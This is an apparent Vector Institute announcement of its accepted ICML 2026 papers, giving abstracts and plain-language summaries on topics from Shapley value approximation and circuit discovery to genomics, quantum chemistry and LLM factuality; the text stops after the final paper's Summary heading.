Vector researchers are presenting work across a broad front at this year’s International Conference on Machine Learning (ICML), taking place July 6–11, 2026 in Seoul, South Korea. With 73 accepted papers – Vector’s strongest showing at ICML to date – and 11 spotlight papers among them, Vector Faculty Members, Vector Faculty Affiliates, Vector Distinguished Postdoctoral Fellows, and Vector staff are contributing to some of the most active areas of machine learning research today.
Vector’s research portfolio at ICML 2026 spans reinforcement learning and post-training for advanced reasoning, generative AI and video generation, multimodal and vision-language systems, autonomous agents, and planning and foundational work in optimization and machine learning theory. Alongside these technical advances, several accepted position papers reflect the community’s commitment to shaping how AI is built and governed – addressing responsible deployment of agentic systems, environmental sustainability, fairness in high-stakes decision-making, and the long-term well-being of people who use AI. Applications in scientific discovery, including genomics, quantum chemistry, and materials modelling further demonstrate the reach of Vector’s research into real-world domains.
Below you will find 73 accepted papers from Vector Faculty Members, Vector Faculty Affiliates, Vector Distinguished Postdoctoral Fellows and Vector staff.
Adalina: Adaptive Linear Approximation for the Shapley Value and Beyond
Weida Li, Yaoliang Yu (Vector Faculty Member), Bryan Kian Hsiang Low
Abstract
The Shapley value, and its broader family of semi-values, has received much attention in various attribution problems. A fundamental and long-standing challenge is their efficient approximation, since exact computation generally requires an exponential number of utility queries in the number of players $n$. To meet the challenges of large-scale applications, we explore the limits of efficiently approximating semi-values under a $\Theta(n)$ space constraint. Building upon a vector concentration inequality, we establish a theoretical framework that enables sharper query complexities for existing unbiased randomized algorithms. Within this framework, we systematically develop a linear-space algorithm that requires $O(\frac{n}{\epsilon^{2}}\log\frac{1}{\delta})$ utility queries to ensure $P(\\|\hat{\boldsymbol\phi}-\boldsymbol\phi\\|\geq\epsilon)\leq \delta$ for all commonly used semi-values. In particular, our framework naturally bridges OFA, unbiased kernelSHAP, SHAP-IQ and the regression-adjusted approach, and definitively characterizes when paired sampling is beneficial. Moreover, our algorithm allows explicit minimization of the mean squared error $\mathbb{E}[\\|\hat{\boldsymbol\phi}-\boldsymbol\phi\\|^{2}]$ for each specific utility function. Accordingly, we introduce the first adaptive, linear-time, linear-space randomized algorithm, Adalina, that theoretically achieves improved mean squared error. All of our theoretical findings are experimentally validated. Our code is available at https://github.com/watml/adalina.
Summary
This work studies how to efficiently approximate the Shapley value and its extensions, which are popular tools for measuring the contributions of individual features, data points, or participants in cooperative systems. Computing these values exactly is usually extremely expensive because the required computation grows exponentially with the number of players. To address this challenge, we develop a new theoretical framework for efficient approximation while using only memory that scales linearly with the number of players. Our analysis further provides improved guarantees on the number of utility evaluations required to obtain sufficiently accurate estimates. Based on this framework, we design a new algorithm called Adalina, which adaptively reduces the expected approximation error for each specific problem instance. Adalina is the first randomized algorithm that is simultaneously adaptive, linear-time, and linear-space. Our framework also unifies several existing approximation methods, including OFA, unbiased kernelSHAP, SHAP-IQ, and regression-adjusted approaches, and clarifies when paired sampling techniques are helpful.
All Circuits Lead to Rome: Rethinking Functional Anisotropy in Circuit and Sheaf Discovery for LLMs
Xi Chen, Mingyu Jin, Jingcheng (Frank) Niu, Yutong Yin, Jinman Zhao, Bangwei Guo, Dimitris Metaxas, Zhaoran Wang, Yutao Yue, Gerald Penn (Vector Faculty Affiliate)
Abstract
In this paper, we present empirical and theoretical evidence against a central but largely implicit assumption in circuit and sheaf discovery (CSD), which we term the Functional Anisotropy Hypothesis: the idea that functions in large language models (LLMs) are localised to a unique or near-unique internal mechanism. We show that a single LLM task can instead be supported by multiple, structurally distinct circuits or sheaves that are simultaneously faithful, sparse, and complete. To systematically uncover such competing mechanisms, we introduce Overlap-Aware Sheaf Repulsion, a method that augments the CSD objective with an explicit penalty on structural overlap across multiple discovery runs, enabling the discovery of circuits or sheaves with strong task performance but minimal shared structure across a plethora of common CSD benchmarks. We find that this phenomenon becomes increasingly pronounced as the number of discovered sheaves grows and persists robustly across major CSD methods. We further identify an ultra-sparse three-edge sheaf and show that none of its edges is individually indispensable, undermining even weakened notions of canonical or essential components. To explain these findings, we propose a Distributive Dense Circuit Hypothesis and provide a theoretical analysis demonstrating that non-unique, low-overlap circuit explanations arise naturally from high-dimensional superposition under mild assumptions. Together, our results suggest that mechanistic explanations in LLMs are inherently non-canonical and call for a rethinking of how CSD results should be interpreted and evaluated.
Summary
Large language models are often interpreted as using a specific internal “circuit” or “sheaf” to perform a task. Our paper challenges this assumption. We show that the same task can often be carried out by many very different internal mechanisms inside the same model, even when those mechanisms barely overlap structurally. To study this systematically, we introduce a method called Overlap-Aware Sheaf Repulsion (OASR) that augments DiscoGP, which explicitly searches for alternative low-overlap circuits or sheaves that still solve the task well. Across multiple benchmarks, by exploiting instabilities and arbitrary choices in existing circuit discovery methods, we consistently uncover many competing explanations rather than a single canonical one. We also identify an extremely small three-edge mechanism for a standard language-model task, but show that even its components are not uniquely essential. Altogether, our results suggest that computation in large language models is more distributed and non-unique than current mechanistic interpretability assumptions imply. We further provide a theoretical framework explaining why multiple low-overlap explanations can naturally arise in large language models.
TLDR: LLM tasks are not implemented by one unique true “circuit” or “sheaf”: many distinct, low-overlap mechanisms can simultaneously support the same behavior.
The Appeal and Reality of Recycling LoRAs with Adaptive Merging
Haokun Liu, Gyung Hyun Je, Marco Ciccone (Vector Distinguished Postdoctoral Fellow, Zhenlin Xu, Prasanth YSS, Colin Raffel (Vector Faculty Member)
Abstract
The widespread availability of fine-tuned LoRA modules for open pre-trained models has led to an interest in methods that can adaptively merge LoRAs to improve performance. These methods typically include some way of selecting LoRAs from a pool and tune merging coefficients based on a task-specific dataset. While adaptive merging methods have demonstrated improvements in some settings, no past work has attempted to recycle LoRAs found “in the wild” on model repositories like the Hugging Face Hub. To address this gap, we consider recycling from a pool of nearly 1,000 user-contributed LoRAs trained from the Llama 3.1 8B-Instruct language model. Our empirical study includes a range of adaptive and non-adaptive merging methods in addition to a new method designed via a wide search over the methodological design space. We demonstrate that adaptive merging methods can improve performance over the base model but provide limited benefit over training a new LoRA on the same data used to set merging coefficients. We additionally find not only that the specific choice of LoRAs to merge has little importance, but that using LoRAs with randomly initialized parameter values yields similar performance. To better understand why past work has proven successful, we confirm that positive transfer is indeed possible when there are highly relevant LoRAs in the pool. We release the model checkpoints and code online at https://github.com/r-three/realistic-adaptive-merging.
Summary
Modern large-language models are generally good at many tasks but not all; they can be further specialized for new task domains using small add-ons (like skill patches). Individual contributors have developed and shared thousands of these patches, freely available for public use. Merging these publicly available skill patches into a single model to enhance specialization in a particular task has therefore emerged as an exciting prospect. We test the viability of this idea by recycling nearly 1,000 skill patches that individual contributors have uploaded to public repositories.
Unfortunately, our work shows that merging these patches is not as effective as training a single fresh skill patch on the same task’s data, which is a simple and straightforward alternative. We find that merging these patches is successful only when the pool consists of highly relevant patches, which is unrealistic in a practical recycling setting. Our analysis suggests that prior work’s successes with skill patch merging may not stem from combining expertise across patches, but rather from a side effect that incidentally stabilizes model behavior. Overall, our finding indicates that effortlessly recycling skill patches is more complicated than it appears.
Attention with Routed-Memory for Learnable Sparse Control
Qiuhao Zeng, Jerry Huang, Peng Lu, Ruiyi Fang, Gezheng Xu, Zihao Jing, Yufei Cui, Charles X. Ling, Gang Niu, Boyu Wang (Vector Faculty Affiliate)
Abstract
Despite advances in long-context inference, large language models (LLMs) remain fundamentally limited by the key-value (KV) caching mechanisms that are necessary for stable computation. Management techniques, such as selective token eviction and pruning, have vastly mitigated the issues that have arisen, but often discard potentially useful information to manage the growing memory requirements of the cache. In this paper, we build upon these approaches to propose Attention with Routed Memory ARM, a novel KV caching structure that introduces a fully differentiable, fixed-size memory system organized as a hierarchical routing structure that learns to select memory slots via Gumbel-Softmax and performs sigmoid-gated updates that softly combine new and stored information, avoiding hard eviction and thereby reducing information loss. By combining this with a policy to dynamically select varying amounts of memory at inference, ARM adapts its accesses for simple contexts and expanding retrieval for inputs that require deeper reasoning, enabling more scalable and effective retrieval on both short and long contexts. Experimental results on standard commonsense and long-context reasoning benchmarks demonstrate that ARM achieves superior performance and efficiency compared to fixed KV-caching approaches, while remaining efficient and scalable in terms of both memory and generation latency.
Summary
Large language model inference is fundamentally limited by a cache of previous computations that needs to be maintained throughout generation. This becomes an issue during long-context inference, thus techniques have been introduced in the past to directly remove elements as the process continues to reduce this burden.
In this work, we introduce _**ARM**_, a new caching structure shaped as a hierarchy with a fixed number of memory slots in which information can be routed and stored. _**ARM**_ gradually mixes in information in a soft manner, avoiding issues that come with directly pruning or evicting individual pieces of information. We further augment _**ARM**_ to dynamically select differing amounts of information from the memories depending on the input context, enabling faster, more effective retrieval on varying types of problems, which is further confirmed by empirical validations.
TLDR: We introduce a new key-value cache structured as a hierarchical router of memories that dynamically selects memory slots to use for different contexts.
Bad Seeing or Bad Thinking? Rewarding Perception for Multimodal Reasoning
Spotlight paper
Haozhe Wang, Qixin Xu, Changpeng Wang, Taofeng Xue, Chong Peng, Wenhu Chen (Vector Faculty Member), Fangzhen Lin
Abstract
Achieving robust perception-reasoning synergy is a central goal for advanced Vision-Language Models (VLMs). Recent advancements have pursued this goal via architectural designs or agentic workflows. However, these approaches are often limited by static textual reasoning or complicated by the significant compute and engineering burden of external agentic complexity. Worse, this heavy investment does not yield proportional gains, often witnessing a “seesaw effect” on perception and reasoning. This motivates a fundamental rethinking of the true bottleneck. In this paper, we argue that the root cause of this trade-off is an ambiguity in modality credit assignment: when a VLM fails, is it due to flawed perception (“bad seeing”) or flawed logic (“bad thinking”)? To resolve this, we introduce a reinforcement learning framework that improves perception-reasoning synergy by reliably rewarding the perception fidelity. We explicitly decompose the generation process into interleaved perception and reasoning steps. This decoupling enables targeted supervision on perception. Crucially, we introduce Perception Verification (PV), leveraging a “blindfolded reasoning” proxy to reward perceptual fidelity independently of reasoning outcomes. Furthermore, to scale training across free-form VL tasks, we propose Structured Verbal Verification, which replaces high-variance LLM judging with structured algorithmic execution. These techniques are integrated into a Modality-Aware Credit Assignment (MoCA) mechanism, which routes rewards to the specific source of error — either bad seeing or bad thinking — enabling a single VLM to achieve simultaneous performance gains across a wide task spectrum.
Summary
When a vision-language AI model gets a question wrong about an image, we don’t know if it saw the wrong thing or thought about it incorrectly — much like a doctor misreading an X-ray versus misinterpreting a correctly-read one. This “bad seeing vs. bad thinking” ambiguity means current training methods cannot target the actual source of error, causing a frustrating tradeoff: improving visual skills degrades reasoning, and vice versa.
We solve this by splitting the model’s response into explicit perception steps (what it sees) and reasoning steps (what it concludes). To evaluate perception independently, we introduce a “blindfolded reasoner” test: we feed the model’s visual descriptions — without the image — to a text-only AI. If it can answer correctly from those descriptions alone, the perception was accurate; if not, the model saw poorly. We combine this with a new structured verification method for evaluating final answers, creating a credit assignment system that precisely blames either “bad seeing” or “bad thinking.”
Our approach, MoCA, is the first to break the perception-reasoning tradeoff. A single 7B-parameter model simultaneously improves on perception-heavy, reasoning-heavy, and document understanding tasks — even surpassing GPT-4o on several benchmarks — without the computational cost of multi-turn agentic systems.
Black-Box Detection of LLM-Generated Text Using Generalized Jensen Shannon Divergence
Shuangyi Chen, Ashish Khisti (Vector Faculty Affiliate)
Abstract
We study black-box detection of machine-generated text under practical constraints: the scoring model (proxy LM) may mismatch the unknown source model, and per-input contrastive generation is costly. We propose SurpMark, a reference-based detector that summarizes a passage by the dynamics of its token surprisals. SurpMark discretizes surprisals into interpretable states, estimates a state-transition matrix for the test text, and scores it via a generalized Jensen–Shannon (GJS) gap between the test transitions and two fixed references (human vs. machine) built once from existing corpora. Theoretically, we derive design guidance for how the discretization bins should scale with data and provide a principled justification for our test statistic. Empirically, across multiple datasets, source models, and scenarios, SurpMark consistently matches or surpasses baselines, demonstrating strong robustness across domains and generators; our experiments on hyperparameter sensitivity exhibit trends that our theoretical results help to explain.
Summary
As AI-generated text becomes increasingly common, it is important to develop reliable ways to distinguish it from human-written text. This paper studies machine-generated text detection by looking at how predictable or surprising each token is under a language model. We propose SurpMark, a method that compares the patterns of these token-level surprise signals between human-written and machine-generated text. Across multiple datasets, generators, and robustness settings, SurpMark performs better than existing detection methods.
TLDR: We propose a reference-based detector using surprisal-state Markov transitions and GJS score to flag AI text—fast, accurate, no regeneration.
Context Forcing: Consistent Autoregressive Video Generation with Long Context
Shuo Chen, Cong Wei, Sun Sun, Tiancheng Shen, Ping Nie, Kai Zou, Ge Zhang, Ming-Hsuan Yang, Wenhu Chen (Vector Faculty Member)
Abstract
Recent approaches to real-time long video generation typically employ streaming tuning strategies, attempting to train a long-context student using a short-context (memoryless) teacher. In these frameworks, the student performs long rollouts but receives supervision from a teacher limited to short 5-second windows. This structural discrepancy creates a critical **student-teacher mismatch**: the teacher’s inability to access long-term history prevents it from guiding the student on global temporal dependencies, effectively capping the student’s context length. To resolve this, we propose **Context Forcing**, a novel framework that trains a long-context student via a long-context teacher. By ensuring the teacher is aware of the full generation history, we eliminate the supervision mismatch, enabling the robust training of models capable of long-term consistency. To make this computationally feasible for extreme durations (e.g., 2 minute), we introduce a context management system that transforms the linearly growing context into a **Slow-Fast Memory** architecture, significantly reducing visual redundancy. Extensive results demonstrate that our method enables effective context lengths exceeding 20 seconds—
6–10x longer than state-of-the-art methods like LongLive and Infinite-RoPE. By leveraging this extended context, Context Forcing preserves superior consistency across long durations, surpassing state-of-the-art baselines on various long video evaluation metrics.
Summary
AI can now generate video in real time, but these systems tend to forget what they created moments earlier, so over a long clip, faces, objects, and backgrounds slowly drift and stop matching up. The cause lies in how the AI is trained: one model (the “student”) learns to produce long videos by imitating a second model (the “teacher”), yet the teacher can only watch a few seconds at a time and remembers nothing before that. A teacher with no memory simply cannot teach the student to stay consistent over the long run.
We fix this by giving the teacher a memory. Our method, Context Forcing, lets the teacher see the entire video generated so far, so it can properly guide the student to stay consistent over time. To keep this practical for videos up to two minutes long, we add a memory system that keeps recent moments in sharp detail while compressing older ones and discarding redundant information.
The result is video that stays coherent over much longer stretches, roughly six to ten times longer than the best existing methods. Characters and scenes hold together from start to finish.
TLDR: Train a long-context student via a long-context teacher.
Counterfactual Residual Data Augmentation for Regression
Hossein Mohebbi, Oliver Schulte, Ke Li, Pascal Poupart (Vector Faculty Member)
Abstract
Data-driven modeling in real-world regression tasks often suffers from limited training samples, high collection costs, and noisy observations. Inspired by the impact of data augmentation in vision and language, we propose a novel Counterfactual Residual Data Augmentation (CRDA) technique for tabular regression. Our key insight is that once a regressor has modeled the systematic component of the data, the remaining noise can be viewed as an invariant residual that remains stable under small perturbations of carefully selected features. We exploit this residual invariance to generate new, yet realistic, training samples, effectively expanding the dataset without requiring additional real data. Our method is model-agnostic and readily applicable to various types of regressors. In experiments across datasets from a variety of benchmark repositories, on average, CRDA reduces an MLP Regressor’s MSE by 22.9% and an XGBoost Regressor’s MSE by 6.4%. When compared to existing state-of-the-art data generators and augmentation techniques, CRDA consistently outperforms in MSE reduction. By adding principled counterfactual variations to the training data, our method offers a simple and efficient remedy for noise-prone, small-sample regression settings.
Summary
Many everyday predictions — a house’s price, a patient’s recovery time, a factory’s output — come from models trained on data in tables. In many real settings, collecting enough data is slow, costly, or impossible, and models trained on too few examples predict poorly. Researchers know how to stretch small datasets of images or text with realistic tweaks like flips or rephrasings, but no equally simple trick existed for tables of numbers.
We developed CRDA, a method that creates believable new training examples. After a model captures the general pattern, each real example still differs slightly from what the model predicted, forming an unexplained gap or error specific to that example. CRDA changes a few of the example’s features, recalculates the model’s predicted outcome, and then re-applies that same gap, producing a new and realistic example. Built-in checks keep only the synthetic examples that actually help, and otherwise leave the model unchanged.
Across many datasets, CRDA cut prediction errors substantially, and more reliably than existing methods, especially when data was scarce. It offers a simple, safe way to get more from limited data in fields like medicine, finance, and manufacturing, where data is expensive to collect.
TLDR: A novel data augmentation methodology that improves regression model performance by generating informed synthetic training examples through residual-guided feature perturbation.
Coupled Cluster con MoLe: Molecular Orbital Learning for Neural Wavefunctions
Luca Anthony Thiede, Abdulrahman Aldossary, Andreas Burger, Jorge Campos-Gonzalez-Angulo, Alex Zook, Melisa Alkan, Kohei Nakaji, Jérôme F. Gonthier, Taylor Patti, Mohammad Vakili, Alán Aspuru-Guzik (Vector Faculty Member)
Abstract
Density functional theory (DFT) is the most widely used method for calculating molecular properties; however, its accuracy is often insufficient for quantitative predictions. Coupled cluster (CC) theory is the most successful method for achieving accuracy beyond DFT and predicting properties that closely align with experiment. It is known as the “gold standard” of quantum chemistry. Unfortunately, the high computational cost of CC limits its widespread applicability. In this work, we present the Molecular Orbital Learning Model (MoLe), an equivariant machine learning model that directly predicts CC’s core mathematical objects, the excitation amplitudes, from the mean-field Hartree-Fock molecular orbitals as inputs. We test various aspects of our model and demonstrate its very high data efficiency and remarkable out-of-distribution generalization to larger molecules and off-equilibrium geometries, despite being trained only on small equilibrium geometries. Finally, we also examine its ability to reduce the number of cycles required to converge CC calculations. MoLe can set the foundations for high-accuracy wavefunction-based ML architectures to accelerate molecular design and complement force-field approaches.
Summary
The best quantum chemistry methods can predict molecular behavior with high accuracy, but they are often too expensive to use routinely. Cheaper methods are faster, but they can miss details that matter for designing medicines, materials, and chemical processes.
- We use molecular orbitals: a cheap description of where electrons are likely to be in a molecule.
- MoLe learns from these orbitals to predict the key quantities used by coupled cluster theory, one of the most reliable but costly methods in quantum chemistry.
- Because molecular orbitals already contain useful chemical information, MoLe can make accurate predictions even for larger molecules and shapes it did not see during training; this is the kind of generalizability needed for practical molecular design.
In short: molecular orbitals are cheap, useful, and already available, and learning from them can make accurate molecular prediction faster and more practical!
TLDR: Prediction of Coupled Cluster amplitudes for data efficient learning of molecular properties
Cross-View Lewis Weight Fusion Empowering Exemplar Replay for Federated Class-Incremental Learning
Zhuang Qi, Yingpeng Tang, Lei Meng, Xiaoxiao Li (Vector Faculty Member), Han Yu, Xiangxu Meng
Abstract
Federated Class-Incremental Learning (FCIL) aims to continually expand a model’s recognition capacity in a distributed environment, enabling it to learn new classes while retaining knowledge of previously seen ones. Exemplar replay has emerged as a promising strategy owing to its simplicity and effectiveness. Existing methods either select exemplars based on local dynamics or construct global feature spaces to identify representative samples. However, they face inherent challenges in striking a balance between effectiveness and privacy. To address this issue, this paper proposes a Cross-view Lewis weIght Fusion method for exemplar replay in FCIL, termed CLIF, which fuses multi-view importance scores to guide representative sample selection under federated settings. Specifically, CLIF consists of two main modules: 1) the cross-view Lewis weight fusion module computes and integrates Lewis weights from multiple feature perspectives to achieve consistent importance estimation, ensuring that the selected samples better reflect the global data distribution and thus enhancing the representativeness of the replay subset. Building on this, 2) the frequency-based weighted training module adjusts the loss contribution of each sample according to its selection frequency across views, which emphasizes the contribution of critical samples. Moreover, we provide a theoretical analysis to guarantee the soundness and effectiveness of CLIF. Extensive experiments on three datasets demonstrate that our method consistently improves baselines by 1%–6%, supporting the above claims.
Summary
Machine learning systems often need to keep learning new things over time. For example, an image recognition model may first learn to identify several types of objects and later need to recognize new ones. However, when the model learns new categories, it may forget what it learned before. This problem becomes harder when data are stored across many users or organizations and cannot be collected in one place due to privacy concerns. In this work, we study how to help such models remember old knowledge while learning new classes. Our idea is to let each participant keep a small but useful set of examples from the past. Instead of choosing these examples from only one viewpoint, our method looks at the data from multiple perspectives and selects examples that are more representative of the overall data. It also gives more attention during training to examples that are repeatedly identified as important. Experiments on three datasets show that our method helps models retain knowledge better and improves performance over existing approaches. This can support more reliable learning systems in privacy-sensitive settings where data must remain distributed.
Curated Synthetic Data Doesn’t Have to Collapse: A Theoretical Study of Generative Retraining with Pluralistic Preferences
Ali Falahati, Mohammad Mohammadi Amiri, Kate Larson (Vector Faculty Affiliate), Lukasz Golab
Abstract
Recursive retraining of generative models poses a critical representation challenge: when synthetic outputs are curated based on a fixed reward signal, the model tends to collapse onto a narrow set of outputs that over-optimize that objective, causing diversity to vanish and failing to represent the full range of preferences. Prior work has suggested that such collapse is unavoidable without adding real data into the mix. In this paper, we revisit that conclusion from an alignment perspective and show that collapse can be mitigated through curation based on multiple reward functions. We formalize the dynamics of recursive training under heterogeneous preferences and prove that, under certain conditions, the model converges to a stable distribution that allocates probability mass across competing high-reward regions. The limiting distribution preserves diversity and provably satisfies a weighted Nash bargaining solution, offering a formal interpretation of value aggregation in synthetic retraining loops.
Summary
AI models are increasingly trained on (synthetic) data produced by earlier AI models. This can help when real data (human-written or human-labeled), but it also creates a problem. Previous work has shown that if each new round keeps only the outputs generated by the earlier model that satisfy only one preference, the model can collapse: its outputs become less varied over time, and in the limit, their variance can shrink to zero.
We study a different way to choose synthetic data. Instead of using one fixed preference, we let the selection process switch between multiple preferences, such as different user tastes or different goals like quality, safety, and creativity. This small change has a large effect. Rather than concentrating on one narrow type of answer or image, the model can keep producing several kinds of desirable outputs.
Our paper gives mathematical conditions under which this happens and tests the idea in synthetic examples, image generation, and text generation. The results suggest that collapse is not an unavoidable consequence of training on synthetic data. It depends on how that data is selected. More pluralistic selection can preserve diversity while still improving the model.
Derivative Informed Learning of Exchange-Correlation Functionals
Eike S. Eberhard, Luca Anthony Thiede, Abdulrahman Aldossary, Andreas Burger, Nicholas Gao, Vignesh Bhethanabotla, Alán Aspuru-Guzik (Vector Faculty Member), Stephan Günnemann
Abstract
Machine-learned (ML) XC functionals aim to replace human-designed density functional approximations by learning directly from reference data, but they still do not consistently outperform traditional $\mathcal{O}(N^4)$-scaling hybrid functionals. We therefore study a hybrid-distillation setting, where $\mathcal{O}(N^3)$-scaling semilocal ML-XC functionals are trained to reproduce B3LYP/def2-SVP targets. We introduce Derivative Informed XC-Loss (DI-Loss), a loss that incorporates additional information from the reference hybrid functional by supervising first and second derivatives of the energy on the Grassmannian of admissible density matrices. Rather than only matching the self-consistent fixed point, DI-Loss aligns the local first- and second-order response of the learned functional with that of the target functional. Across four evaluated architectures, DI-Loss consistently improves the main energy metrics. Averaged uniformly across architectures, the total-energy MAE decreases by 66% relative to energy and density supervision alone. The density-sensitive mean-field energy metric $E_\rho$ improves from 1.2 to 0.8 mEh on average, while dipole and $\mathcal{L}_2$ density errors do not improve uniformly. We further show that densities from the distilled functionals reduce hybrid-functional SCF iterations by up to 55%. In downstream TDDFT calculations, Hessian supervision improves excited-state predictions, with XCdiff reducing the mean excitation-energy MAE by 24-35% across molecule sizes on QM40.
Summary
Accurate computer simulations are an important tool for designing new molecules and materials, with applications ranging from drug discovery to batteries, catalysts, and sustainable chemicals. These simulations can predict properties before a compound is synthesized in the lab, but there is a persistent trade-off: the most accurate quantum-chemical methods are often too expensive to use at large scale, while cheaper methods can miss important effects.
This work uses machine learning to make high-quality chemistry calculations cheaper. We focus on density functional theory, one of the most widely used approaches in computational chemistry. In density functional theory, the main source of error is an approximation called the exchange-correlation functional, which determines how electrons interact beyond simple electrostatics. More accurate functionals, such as hybrid functionals, are useful but computationally expensive. Cheaper functionals are faster, but usually less accurate.
Our idea is to train a machine-learned functional to imitate a more expensive hybrid functional, so that it can provide similar predictions at substantially lower computational cost. Instead of only teaching the model to match final energies and electron densities, we also teach it how the reference calculation locally responds when the electron density is changed. In other words, the model learns not only the correct answer, but also the local shape of the quantum-mechanical energy landscape around that answer.
This additional derivative information makes the learned functional more reliable. Across several neural-network architectures, our derivative-informed training objective improves the main energy metrics compared with standard energy and density supervision. On average, it reduces total-energy errors by 66%. The learned functionals also produce electron densities that can be used to initialize more expensive hybrid-functional calculations, reducing the number of self-consistent solver iterations by up to 55%. This means that even when the expensive calculation is still needed, the machine-learned model can help reach the answer faster.
We also test whether the learned functionals capture information relevant beyond ground-state energies. In time-dependent density functional theory, which is used to predict optical and excited-state properties, the curvature of the energy functional is crucial. By supervising this curvature during training, our method improves excited-state predictions, reducing excitation-energy errors by 24–35% in our experiments.
Overall, this work shows how machine learning can distill expensive quantum-chemical models into cheaper ones while preserving important physical behavior. This could make accurate molecular and materials modelling more practical for large-scale screening tasks, such as searching for better drug candidates, catalysts, or functional materials.
TLDR: We train XC-functionals by supervising energy gradients on the manifold of density matrices and distill hybrid functionals
Discretized Density-Guided Source-Free Adaptation for Continuous Targets
Spotlight paper
Gezheng Xu, Qi Chen, Qiuhao Zeng, Charles X. Ling, Boyu Wang (Vector Faculty Affiliate)
Abstract
Source-Free Domain Adaptation (SFDA) enables model adaptation under distribution shifts without access to source data, providing a practical solution for privacy-sensitive applications and having shown substantial progress in classification. In contrast, regression involves ordered and continuous target variables, posing unique challenges for representation adaptation and pseudo-label refinement in the SFDA setting. To address this gap, we propose a novel algorithm for continuous target prediction in SFDA that leverages instance-dependent, discretized density–informed supervisory signals to refine pseudo-labels within an uncertainty-aware paradigm. By incorporating auxiliary discretized distribution learning, our method also promotes more compact and structured feature representations, mitigating the inherent difficulties of adapting regression models under distribution shift. We theoretically demonstrate that the resulting density structure is robust to potential perturbations, supporting reliable SFDA for regression. Extensive experiments across multiple benchmarks validate the effectiveness of the proposed approach.
Summary
When an AI model trained on one dataset is applied to a new, different setting, its performance often drops, which is known as distribution shift. In many real-world applications, such as healthcare and manufacturing, retraining the model is not an option because the original training data may be private or unavailable, and the new data lacks labels. This problem is especially difficult for tasks that predict continuous values (like a patient’s age or a machine’s remaining lifespan), rather than choosing from a fixed set of categories. We developed MERCI, a method that helps models adapt to new environments without accessing the original data or any labels. MERCI works by converting the model’s uncertain predictions into a histogram — a simple bar-chart-like representation of where the true value is likely to fall — and uses this to generate better-calibrated guidance for the model to learn from. Our experiments across diverse tasks show that MERCI consistently improves prediction accuracy after adaptation, offering a practical and privacy-respecting solution for deploying regression models in changing real-world conditions.
dnaHNet: A Scalable and Hierarchical Foundation Model for Genomic Sequence Learning
Spotlight paper
Arnav Shah, Junzhe Li, Parsa Idehpour, Adibvafa Fallahpour, Brandon Wang, Sukjun Hwang, Bo Wang (Vector Faculty Member), Patrick Hsu, Hani Goodarzi, Albert Gu
Abstract
Genomic foundation models have the potential to decode DNA syntax, yet face a fundamental tradeoff. Standard subword tokenizers fragment biologically meaningful motifs such as codons and regulatory elements, while nucleotide-level models preserve biological coherence but incur prohibitive computational costs for long contexts. We introduce dnaHNet, a state-of-the-art tokenizer-free autoregressive model that segments and models genomic sequences end to end. Using a differentiable dynamic chunking mechanism, dnaHNet compresses raw nucleotides into latent tokens adaptively, balancing compression with predictive accuracy. Pretrained on prokaryotic genomes, dnaHNet outperforms leading architectures including StripedHyena2 in scaling and efficiency. This recursive chunking yields quadratic FLOP reductions, enabling $>3 \times$ inference speedup over Transformers. On zero-shot tasks, dnaHNet achieves superior performance in predicting protein variant fitness and gene essentiality, while automatically discovering hierarchical biological structures without supervision. These results establish dnaHNet as a scalable, interpretable framework for next-generation genomic modeling.
Summary
DNA contains instructions that help determine how living organisms grow, function, and respond to changes. Recent AI models can learn patterns in DNA, but they face a difficult tradeoff: reading DNA one letter at a time preserves biological meaning but is slow and expensive, while chopping DNA into fixed “words” can break apart meaningful biological units.
We developed dnaHNet, an AI model that learns how to group DNA letters on its own instead of relying on a fixed vocabulary. As it reads raw DNA sequences, dnaHNet dynamically compresses nearby letters into larger learned pieces, allowing it to keep important biological structure while making long DNA sequences easier to process.
In experiments on microbial genomes, dnaHNet was faster and more efficient than strong existing models, while also performing well on tasks such as predicting the effects of protein mutations and identifying genes that are essential for survival. Because the model also learns meaningful biological groupings without being explicitly told what to look for, dnaHNet offers a scalable and more interpretable path toward AI systems that can help researchers understand genomes.
TLDR: HNet architectures scale better and perform better on relevant downstream biological evaluations than SOTA genomic foundation models.
Efficient Public Verification of Private ML via Regularization
Zoë R Bell, Anvith Thudi, Olive Franzese-McLaughlin, Nicolas Papernot (Vector Faculty Member), Shafi Goldwasser
Abstract
Training with differential privacy (DP) guarantees dataset members that they cannot be identified by users of the released model. However, those data providers, and, in general, the public, lack methods to efficiently verify that models trained on their data satisfy DP guarantees. The amount of compute needed to verify DP guarantees for current algorithms scales with the amount of computation required to train the model. In this paper we design the first DP algorithm with near optimal privacy-utility trade-offs but whose DP guarantees can be verified cheaper than training. We focus on DP stochastic convex optimization (DP-SCO), where optimal privacy-utility trade-offs are known. Here we show we can obtain tight privacy-utility trade-offs by privately minimizing a series of regularized objectives and only using the standard DP composition bound. Crucially, this method can be verified with much less compute than training. This leads to the first known DP-SCO algorithm with near optimal privacy-utility whose DP verification scales better than training cost, significantly reducing verification costs on large datasets.
Summary
Machine learning models can reveal sensitive information about the individuals whose data the model was trained on. The standard approach to ensuring a model does not reveal information about these individuals is to use specially designed training algorithms, but the public lacks tools to verify a model was trained using such an algorithm. In this paper we explore how we might design these private training algorithms so that it is also easy for the public to verify they were used. This led us to an algorithm which kept the optimal utility guarantees of past algorithms, but drastically decreased the time it takes for verification. In doing so, we made progress towards enabling the public to verify how their information is being used by entities training models.
TLDR: We provide the first known DP-SCO algorithm with near optimal privacy- utility whose DP verification scales better than training cost
Embedding Trust: Semantic Isotropy Predicts Nonfactuality in Long-Form Text Generation
Dhrupad Bhardwaj, Julia Kempe, Tim G. J. Rudner (incoming Vector Faculty Member)
Abstract
To deploy large language models (LLMs) in high-stakes application domains that require substantively accurate responses to open-ended prompts, we need reliable, computationally inexpensive methods that assess the trustworthiness of long-form responses generated by LLMs. However, existing approaches often rely on claim-by-claim fact-checking, which is computationally expensive and brittle in long-form responses to open-ended prompts. In this work, we introduce semantic isotropy—the degree of uniformity across normalized text embeddings on the unit sphere—and use it to assess the trustworthiness of long-form responses generated by LLMs. To do so, we generate several long-form responses, embed them, and estimate the level of semantic isotropy of these responses as the angular dispersion of the embeddings on the unit sphere. We find that higher semantic isotropy—that is, greater embedding dispersion—reliably signals lower factual consistency across samples. Our approach requires no labeled data, no fine-tuning, and no hyperparameter selection, and can be used with open- or closed-weight embedding models. Across multiple domains, our method consistently outperforms existing aggregate trust signals in predicting nonfactuality using only a handful of samples, offering a practical, low-cost first-pass signal that complements claim-level verification in real-world LLM workflows.
Summary
